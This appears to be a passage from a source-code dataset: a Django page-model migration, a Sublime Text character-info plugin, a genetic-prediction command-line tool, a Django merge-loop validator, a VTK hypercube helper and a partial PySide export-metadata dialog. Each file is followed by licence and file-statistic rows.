('template', models.CharField(max_length=254, blank=True)),
('comment', models.TextField(max_length=254, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('date_approved', models.DateTimeField(null=True, verbose_name='Approved', blank=True)),
('date_publication', models.DateTimeField(null=True, verbose_name='Publication date', blank=True)),
('date_publication_end', models.DateTimeField(null=True, verbose_name='Publication end date', blank=True)),
('is_draft', models.BooleanField(default=True, verbose_name='Draft')),
('is_approved', models.BooleanField(default=False, verbose_name='Approved')),
('is_hidden', models.BooleanField(default=False, verbose_name='Hidden')),
('is_published', models.BooleanField(default=False, verbose_name='Published')),
('is_login_required', models.BooleanField(default=False, verbose_name='Login required')),
('is_permission_required', models.BooleanField(default=False, verbose_name='Permission required')),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('created_by', models.ForeignKey(related_name='page_creator', to=settings.AUTH_USER_MODEL, null=True)),
('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='pages.Page', null=True)),
('sites', models.ManyToManyField(help_text='The site(s) where this pages is accessible.', to='sites.Site', verbose_name='sites')),
('updated_by', models.ForeignKey(related_name='page_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ['tree_id', 'lft'],
'get_latest_by': 'date_publication',
'verbose_name': 'Page',
'verbose_name_plural': 'Pages',
'permissions': (('view_page', 'Can view pages'),),
},
),
migrations.CreateModel(
name='PageContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
],
options={
'verbose_name': 'Content',
'verbose_name_plural': 'Content',
},
),
migrations.CreateModel(
name='PageContentType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type')),
('class_name', models.CharField(max_length=100, verbose_name='Class')),
('admin_class_name', models.CharField(max_length=100, verbose_name='Admin Class')),
('is_extended', models.BooleanField(default=False, verbose_name='Extended')),
],
options={
'verbose_name': 'Content Type',
'verbose_name_plural': 'Content Types',
},
),
migrations.CreateModel(
name='PageGroupObjectPermission',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('content_object', models.ForeignKey(to='pages.Page')),
('group', models.ForeignKey(to='auth.Group')),
('permission', models.ForeignKey(to='auth.Permission')),
],
options={
'verbose_name': 'Page Group Permissions',
'verbose_name_plural': 'Pages Groups Permissions',
},
),
migrations.CreateModel(
name='PageMarkdownContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('text', markitup.fields.MarkupField(no_rendered_field=True, blank=True)),
('is_template', models.BooleanField(default=False, verbose_name='Template?')),
('_text_rendered', models.TextField(editable=False, blank=True)),
('created_by', models.ForeignKey(related_name='pages_pagemarkdowncontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pagemarkdowncontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Markdown',
'verbose_name_plural': 'Markdown',
},
),
migrations.CreateModel(
name='PageMetaContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('title', models.CharField(max_length=160, blank=True)),
('description', models.TextField(max_length=160, blank=True)),
('keywords', models.CharField(max_length=200, blank=True)),
('is_noindex', models.BooleanField(default=False, verbose_name='NoIndex')),
('is_nofollow', models.BooleanField(default=False, verbose_name='NoFollow')),
('created_by', models.ForeignKey(related_name='pages_pagemetacontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pagemetacontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Meta',
'verbose_name_plural': 'Meta',
},
),
migrations.CreateModel(
name='PageRedirectContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('redirect_to_page', models.CharField(max_length=254, null=True, blank=True)),
('redirect_to_url', models.URLField(max_length=254, null=True, blank=True)),
('is_permanent', models.BooleanField(default=False, verbose_name='Permanent')),
('created_by', models.ForeignKey(related_name='pages_pageredirectcontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pageredirectcontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Redirect',
'verbose_name_plural': 'Redirect',
},
),
migrations.CreateModel(
name='PageSlugContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('slug', models.CharField(max_length=245)),
('created_by', models.ForeignKey(related_name='pages_pageslugcontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pageslugcontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Slug',
'verbose_name_plural': 'Slugs',
},
),
migrations.CreateModel(
name='PageTextContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('text', models.TextField(blank=True)),
('is_template', models.BooleanField(default=False, verbose_name='Template?')),
('created_by', models.ForeignKey(related_name='pages_pagetextcontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pagetextcontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Text',
'verbose_name_plural': 'Text',
},
),
migrations.CreateModel(
name='PageUserObjectPermission',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('content_object', models.ForeignKey(to='pages.Page')),
('permission', models.ForeignKey(to='auth.Permission')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Page User Permissions',
'verbose_name_plural': 'Pages Users Permissions',
},
),
migrations.AddField(
model_name='pagecontent',
name='type',
field=models.ForeignKey(to='pages.PageContentType'),
),
migrations.AlterUniqueTogether(
name='pageslugcontent',
unique_together=set([('language', 'page')]),
),
migrations.AlterUniqueTogether(
name='pagemetacontent',
unique_together=set([('language', 'page')]),
),
migrations.AlterUniqueTogether(
name='pagecontent',
unique_together=set([('page', 'type')]),
),
]
| bsd-3-clause | -6,709,578,750,606,742,000 | 59.064516 | 146 | 0.578075 | false | 4.355556 | false | false | false |
michaelhogg/sublime-character-info | character_info.py | 1 | 3320 | import sublime, sublime_plugin, unicodedata
# Needed because unicodedata.name() doesn't return names of control characters
# See stackoverflow.com/questions/24552786/why-doesnt-unicodedata-recognise-certain-characters
UNNAMED_CONTROL_CHARS = {
0x00: 'NULL',
0x01: 'START OF HEADING',
0x02: 'START OF TEXT',
0x03: 'END OF TEXT',
0x04: 'END OF TRANSMISSION',
0x05: 'ENQUIRY',
0x06: 'ACKNOWLEDGE',
0x07: 'BELL',
0x08: 'BACKSPACE',
0x09: 'CHARACTER TABULATION',
0x0A: 'LF: LINE FEED',
0x0B: 'LINE TABULATION',
0x0C: 'FF: FORM FEED',
0x0D: 'CR: CARRIAGE RETURN',
0x0E: 'SHIFT OUT',
0x0F: 'SHIFT IN',
0x10: 'DATA LINK ESCAPE',
0x11: 'DEVICE CONTROL ONE',
0x12: 'DEVICE CONTROL TWO',
0x13: 'DEVICE CONTROL THREE',
0x14: 'DEVICE CONTROL FOUR',
0x15: 'NEGATIVE ACKNOWLEDGE',
0x16: 'SYNCHRONOUS IDLE',
0x17: 'END OF TRANSMISSION BLOCK',
0x18: 'CANCEL',
0x19: 'END OF MEDIUM',
0x1A: 'SUBSTITUTE',
0x1B: 'ESCAPE',
0x1C: 'INFORMATION SEPARATOR FOUR',
0x1D: 'INFORMATION SEPARATOR THREE',
0x1E: 'INFORMATION SEPARATOR TWO',
0x1F: 'INFORMATION SEPARATOR ONE',
0x7F: 'DELETE',
0x80: 'CONTROL U+0080',
0x81: 'CONTROL U+0081',
0x82: 'BREAK PERMITTED HERE',
0x83: 'NO BREAK HERE',
0x84: 'CONTROL U+0084',
0x85: 'NEL: NEXT LINE',
0x86: 'START OF SELECTED AREA',
0x87: 'END OF SELECTED AREA',
0x88: 'CHARACTER TABULATION SET',
0x89: 'CHARACTER TABULATION WITH JUSTIFICATION',
0x8A: 'LINE TABULATION SET',
0x8B: 'PARTIAL LINE FORWARD',
0x8C: 'PARTIAL LINE BACKWARD',
0x8D: 'REVERSE LINE FEED',
0x8E: 'SINGLE SHIFT TWO',
0x8F: 'SINGLE SHIFT THREE',
0x90: 'DEVICE CONTROL STRING',
0x91: 'PRIVATE USE ONE',
0x92: 'PRIVATE USE TWO',
0x93: 'SET TRANSMIT STATE',
0x94: 'CANCEL CHARACTER',
0x95: 'MESSAGE WAITING',
0x96: 'START OF GUARDED AREA',
0x97: 'END OF GUARDED AREA',
0x98: 'START OF STRING',
0x99: 'CONTROL U+0099',
0x9A: 'SINGLE CHARACTER INTRODUCER',
0x9B: 'CONTROL SEQUENCE INTRODUCER',
0x9C: 'STRING TERMINATOR',
0x9D: 'OPERATING SYSTEM COMMAND',
0x9E: 'PRIVACY MESSAGE',
0x9F: 'APPLICATION PROGRAM COMMAND'
}
def getUnicodeCharName(char):
charName = unicodedata.name(char, 'Unknown') # Get the Unicode name assigned to the character
charCode = ord(char)
if charName == 'Unknown' and charCode in UNNAMED_CONTROL_CHARS:
charName = UNNAMED_CONTROL_CHARS[charCode]
return charName
def updateStatusBar(view):
char = view.substr(view.sel()[0].a) # The character at the cursor or start of selection
hexCode = hex(ord(char)).upper().replace('X','x')
statusString = 'Char ' + hexCode
viewEncoding = view.encoding()
if viewEncoding == 'UTF-8' or viewEncoding == 'Undefined':
# The encoding may be Undefined if the file only contains 7-bit ASCII characters
# which are common to many encodings (UTF-8, ISO-8859-1, Windows-1251, etc)
charName = getUnicodeCharName(char)
statusString += ' (' + charName + ')'
view.set_status('zzCharacterInfo', statusString)
class CharacterInfoListener(sublime_plugin.EventListener):
def on_selection_modified(self, view):
updateStatusBar(view)
| mit | 709,713,128,041,639,400 | 34.319149 | 100 | 0.65512 | false | 3.105706 | false | false | false |
bulik/mtpred | mtpred.py | 1 | 6089 | #!/usr/bin/env python
'''
(c) 2015-Present Brendan Bulik-Sullivan
Multi-trait genetic prediction.
'''
from __future__ import division
import argparse
import time
from core import bayes
from core import ld
import traceback
import sys
import pandas as pd
try:
x = pd.DataFrame({'A': [1, 2, 3]})
x.drop_duplicates(subset='A')
except TypeError:
raise ImportError('mtpred requires pandas version > 0.15.2')
__version__ = '0.1'
MASTHEAD = "*************************************\n"
MASTHEAD += "* Multi-Trait Prediction (mtpred)\n"
MASTHEAD += "* Version {V}\n".format(V=__version__)
MASTHEAD += "* (C) 2015 Brendan Bulik-Sullivan\n"
MASTHEAD += "* Broad Institute of MIT and Harvard\n"
MASTHEAD += "* GNU General Public License v3\n"
MASTHEAD += "*************************************\n"
def sec_to_str(t):
'''Convert seconds to days:hours:minutes:seconds'''
[d, h, m, s, n] = reduce(
lambda ll, b: divmod(ll[0], b) + ll[1:], [(t, 1), 60, 60, 24])
f = ''
if d > 0:
f += '{D}d:'.format(D=int(d))
if h > 0:
f += '{H}h:'.format(H=int(h))
if m > 0:
f += '{M}m:'.format(M=int(m))
f += '{S}s'.format(S=s)
return f
class Logger(object):
'''Print to log file and stdout.'''
def __init__(self, fh):
self.log_fh = open(fh, 'wb', 0)
def log(self, msg, stdout=True):
'''Print to log file and stdout.'''
print >>self.log_fh, msg
if stdout:
x = str(msg).split('\n')
if len(x) > 20:
msg = '\n'.join(x[1:10])
msg += '\nOutput truncated. See log file for full list.'
sys.stdout.write(str(msg)+'\n')
sys.stdout.flush()
def close(self):
self.log_fh.close()
class ThrowingArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ValueError(message)
def print_help(self, masthead=True):
if masthead:
print MASTHEAD
argparse.ArgumentParser.print_help(self)
parser = ThrowingArgumentParser()
subparsers = parser.add_subparsers()
# eigendecomposition of LD matrices
eigen = subparsers.add_parser('ld', help='Calculate eigen-decompositions'
' of LD matrices.')
eigen.add_argument('--bfile', default=None, type=str, required=True,
help='Filename prefix for plink .bed/.bim/.fam fileset.')
ld_wind = eigen.add_mutually_exclusive_group(required=True)
ld_wind.add_argument('--ld-wind-snp', default=None, type=int, nargs=2,
help='First arg window size, second arg buffer size.'
' Units are # SNPs.',
metavar=('WIND', 'BUF'))
ld_wind.add_argument('--ld-wind-kb', default=None, type=int, nargs=2,
help='Not implemented yet.',
metavar=('WIND', 'BUF'))
ld_wind.add_argument('--ld-wind-cm', default=None, type=int, nargs=2,
help='Not implemented yet.',
metavar=('WIND', 'BUF'))
eigen.add_argument('--covar', default=None, type=str,
help='Covariates.')
eigen.add_argument('--out', default='mtpred', type=str,
help='Output filename prefix, default mtpred.')
# posterior mean beta
pmb = subparsers.add_parser('pmb', help='Convert summary statistics to '
'prediction weights.')
pmb.add_argument('--sumstats', default=None, type=str, required=True,
nargs='+',
help='List of filenames in .sumstats format containing GWAS '
'summary statistics.')
pmb.add_argument('--mat', default=None, type=str, required=True, nargs=2,
help='Genetic covariance matrix '
'followed by a sample overlap matrix.',
metavar=('VG', 'P'))
pmb.add_argument('--eigen-ld', default=None, type=str, required=True,
help='Pre-computed eigen-decomposition of the LD matrix'
' (from mypred.py ld).')
pmb.add_argument('--png', default=False, action='store_true',
help='Save per-normalized-genotype weights? ' +
'(default per-allele).')
pmb.add_argument('--out', default='mtpred', type=str,
help='Output filename prefix, default mtpred.')
pmb.add_argument('--block-buf', default=3, type=int,
help='Eigenblock buffer size.')
if __name__ == '__main__':
try:
args = parser.parse_args()
except ValueError: # override bad help msgs w/ subparsers
print MASTHEAD
ex_type, ex, tb = sys.exc_info()
print traceback.format_exc(ex)
parser.print_help(masthead=False)
sys.exit(2)
if args.out is None:
raise ValueError('--out is required.')
log = Logger(args.out+'.log')
start_time = time.time()
try:
opts = vars(args)
opts = {x: ' '.join([str(i) for i in opts[x]])
if type(opts[x]) is list
else opts[x] for x in
filter(lambda y: opts[y] is not None, opts)}
header = MASTHEAD
header += "\nOptions: \n"
options = [
' --' + x.replace('_', '-') + ' ' + str(opts[x]) for x in opts]
header += '\n'.join(options) + '\n'
log.log(header)
log.log('Beginning analysis at {T}'.format(T=time.ctime()))
try:
args.bfile
which = 'ld'
except AttributeError:
which = 'pmb'
if which == 'ld':
ld.eigenblocks(args, log)
elif which == 'pmb':
bayes.mtpred(args, log)
else:
log.log('Something went horribly wrong.')
except Exception:
ex_type, ex, tb = sys.exc_info()
log.log(traceback.format_exc(ex), stdout=False)
raise
finally:
log.log('Analysis finished at {T}'.format(T=time.ctime()))
time_elapsed = round(time.time() - start_time, 2)
log.log('Total time elapsed: {T}'.format(T=sec_to_str(time_elapsed)))
log.close()
| gpl-3.0 | 5,219,009,283,091,956,000 | 34.608187 | 78 | 0.549844 | false | 3.590212 | false | false | false |
damonkelley/django-name | name/validators.py | 1 | 2762 | from django.core.exceptions import ValidationError
def follow_merged_with(name):
"""A generator to get the merged_with relationship
of a Name object.
This will return a Name object until it reaches a Name that
does not have a merged_with relationship.
"""
while name:
merged_into = name.merged_with
if merged_into:
yield merged_into
name = merged_into
def validate_merged_with(name):
"""Validator for the merged_with ForeignKey field.
This will prevent two scenarios from occurring.
1. Merging with a nonexistent Name object.
2. Creating a loop of foreign key relationships.
For example:
Name 1 -> Name 2 -> Name 3 -> Name 1
We need to prevent this because navigating to a name that has
been merged with another, will redirect you to the Name it has
been merged with. If a loop is created, we will also create
the opportunity for an HTTP redirect loop.
Unlike typical Django validators, this requires a model instance
as a parameter, instead of the value, which in this case would have
been the ID of the related model. Because of this requirement, this
validator cannot be added via the `validator` kwarg on a ForeignKey
field. Rather this method should be called from the `clean` method.
"""
# Return early if there is no need to validate.
if name.merged_with is None:
return
# Get the Name class from the model instance, to avoid
# circular importing name.models.Name.
Name = name.__class__
# Prevent the user from attempting to merge with a nonexistent
# Name.
try:
merge_target = Name.objects.get(id=name.merged_with_id)
except Name.DoesNotExist:
raise ValidationError(
dict(merged_with=u'The merge target must exist.'))
# Prevent the user from attempting to merge a name with itself.
if name.merged_with_id == name.id:
raise ValidationError(
dict(merged_with=u'Unable to merge a Name with itself.'))
# Iterate through the generator and keep track of the return names.
# We will find a loop if the return name is already in
# merged_list. If this happens we will raise a validation error.
# If we don't find duplicates, then no loop has been created and
# the generator will raise it's own StopIteration and we will
# implicitly return.
merge_sequence = [name]
for name in follow_merged_with(merge_target):
if name in merge_sequence:
msg = (u'The specified merge action completes a merge loop. '
'Unable to complete merge.')
raise ValidationError(dict(merged_with=msg))
merge_sequence.append(name)
| bsd-3-clause | 8,021,655,770,274,407,000 | 37.361111 | 73 | 0.674873 | false | 4.476499 | false | false | false |
batearedcollie/seisTK | stk/hyperCubeUtility.py | 1 | 3401 | # Copyright 2017 Bateared Collie
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may
# be used to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from vtk.util import numpy_support
from stk.DataTypes import vtkHyperCube
import numpy as np
def hyperCubeGenerate(array=np.zeros([100,1]),
delta=[1.,1.],
origin=[0.,0.],
name="HyperCubeData",
copy=True
):
'''
@summary: Generates a vtkHyperCube object from an input numpy array and axis.
@param array: input data array
@type array: numpy nd array
@param traceDictList: trace dictionary
@type traceDictList: [dict]
@param delta: time sampling
@type delta: float
@param origin: origin time for traces
@type origin: float
@param name: Name for data array
@type name: string
@param copy: perform a copy of the source array (turn this off at own risk)
@type copy: boolean
** Example Usage **
>>> import stk.generators as gen
>>> cube = gen.hyperCubeGenerate(array=np.zeros([10,20,5,6],dtype=np.float),
delta=[0.1,0.2,1.,2.],
origin=[-0.5,0.,-10.,3.],
)
.. warning::
If you use copy=False then you should not try to access the
the trace data after processing.
'''
# Check the axis number
nDim=len(array.shape)
if len(delta)!=nDim:
raise Exception("Delta length does not match array dimensions")
if len(origin)!=nDim:
raise Exception("Delta length does not match array dimensions")
tpD = vtkHyperCube()
tpD.SetNDimensions(nDim)
tpD.SetDimensions(np.flip(array.shape,0))
tpD.SetSpacing(delta)
tpD.SetOrigin(origin)
vtk_data = numpy_support.numpy_to_vtk(array.flatten(),deep=copy)
vtk_data.SetName(name)
tpD.GetPointData().SetScalars(vtk_data)
return tpD | bsd-3-clause | 5,139,039,446,379,599,000 | 36.384615 | 95 | 0.670391 | false | 4.235367 | false | false | false |
changbiao/pyExifToolGUI | scripts/ui/ui_export_metadata.py | 1 | 11160 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'export_metadata.ui'
#
# Created: Sun Dec 8 11:53:10 2013
# by: pyside-uic 0.2.14 running on PySide 1.1.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Dialog_export_metadata(object):
def setupUi(self, Dialog_export_metadata):
Dialog_export_metadata.setObjectName("Dialog_export_metadata")
Dialog_export_metadata.resize(428, 438)
self.qdem_dialogButtonBox = QtGui.QDialogButtonBox(Dialog_export_metadata)
self.qdem_dialogButtonBox.setGeometry(QtCore.QRect(70, 390, 341, 32))
self.qdem_dialogButtonBox.setOrientation(QtCore.Qt.Horizontal)
self.qdem_dialogButtonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.qdem_dialogButtonBox.setObjectName("qdem_dialogButtonBox")
self.qdem_frame = QtGui.QFrame(Dialog_export_metadata)
self.qdem_frame.setGeometry(QtCore.QRect(20, 110, 351, 191))
self.qdem_frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.qdem_frame.setFrameShadow(QtGui.QFrame.Raised)
self.qdem_frame.setObjectName("qdem_frame")
self.gridLayoutWidget = QtGui.QWidget(self.qdem_frame)
self.gridLayoutWidget.setGeometry(QtCore.QRect(90, 40, 251, 141))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.rmdd_gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.rmdd_gridLayout.setContentsMargins(0, 0, 0, 0)
self.rmdd_gridLayout.setObjectName("rmdd_gridLayout")
self.qdem_chk_export_exif_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_exif_data.setObjectName("qdem_chk_export_exif_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_exif_data, 0, 0, 1, 1)
self.qdem_chk_export_xmp_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_xmp_data.setObjectName("qdem_chk_export_xmp_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_xmp_data, 1, 0, 1, 1)
self.qdem_chk_export_iptc_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_iptc_data.setObjectName("qdem_chk_export_iptc_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_iptc_data, 3, 0, 1, 1)
self.qdem_chk_export_gps_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_gps_data.setObjectName("qdem_chk_export_gps_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_gps_data, 2, 0, 1, 1)
self.qdem_chk_export_iccprofile_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_iccprofile_data.setObjectName("qdem_chk_export_iccprofile_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_iccprofile_data, 4, 0, 1, 1)
self.qdem_chk_export_all_metadata = QtGui.QCheckBox(self.qdem_frame)
self.qdem_chk_export_all_metadata.setGeometry(QtCore.QRect(20, 10, 162, 17))
self.qdem_chk_export_all_metadata.setObjectName("qdem_chk_export_all_metadata")
self.qdem_lbl = QtGui.QLabel(Dialog_export_metadata)
self.qdem_lbl.setGeometry(QtCore.QRect(20, 10, 391, 101))
self.qdem_lbl.setWordWrap(True)
self.qdem_lbl.setObjectName("qdem_lbl")
self.qdem_lbl2 = QtGui.QLabel(Dialog_export_metadata)
self.qdem_lbl2.setGeometry(QtCore.QRect(20, 310, 91, 16))
self.qdem_lbl2.setObjectName("qdem_lbl2")
self.horizontalLayoutWidget = QtGui.QWidget(Dialog_export_metadata)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(10, 330, 401, 41))
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setContentsMargins(10, -1, -1, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
self.qdem_txt_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_txt_radiobutton.setChecked(True)
self.qdem_txt_radiobutton.setObjectName("qdem_txt_radiobutton")
self.horizontalLayout.addWidget(self.qdem_txt_radiobutton)
self.qdem_tab_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_tab_radiobutton.setObjectName("qdem_tab_radiobutton")
self.horizontalLayout.addWidget(self.qdem_tab_radiobutton)
self.qdem_xml_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_xml_radiobutton.setObjectName("qdem_xml_radiobutton")
self.horizontalLayout.addWidget(self.qdem_xml_radiobutton)
self.qdem_html_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_html_radiobutton.setObjectName("qdem_html_radiobutton")
self.horizontalLayout.addWidget(self.qdem_html_radiobutton)
self.qdem_xmp_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_xmp_radiobutton.setObjectName("qdem_xmp_radiobutton")
self.horizontalLayout.addWidget(self.qdem_xmp_radiobutton)
self.qdem_csv_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_csv_radiobutton.setEnabled(True)
self.qdem_csv_radiobutton.setObjectName("qdem_csv_radiobutton")
self.horizontalLayout.addWidget(self.qdem_csv_radiobutton)
self.retranslateUi(Dialog_export_metadata)
QtCore.QObject.connect(self.qdem_dialogButtonBox, QtCore.SIGNAL("accepted()"), Dialog_export_metadata.accept)
QtCore.QObject.connect(self.qdem_dialogButtonBox, QtCore.SIGNAL("rejected()"), Dialog_export_metadata.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog_export_metadata)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_all_metadata, self.qdem_chk_export_exif_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_exif_data, self.qdem_chk_export_xmp_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_xmp_data, self.qdem_chk_export_gps_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_gps_data, self.qdem_chk_export_iptc_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_iptc_data, self.qdem_chk_export_iccprofile_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_iccprofile_data, self.qdem_txt_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_txt_radiobutton, self.qdem_tab_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_tab_radiobutton, self.qdem_xml_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_xml_radiobutton, self.qdem_html_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_html_radiobutton, self.qdem_xmp_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_xmp_radiobutton, self.qdem_csv_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_csv_radiobutton, self.qdem_dialogButtonBox)
def retranslateUi(self, Dialog_export_metadata):
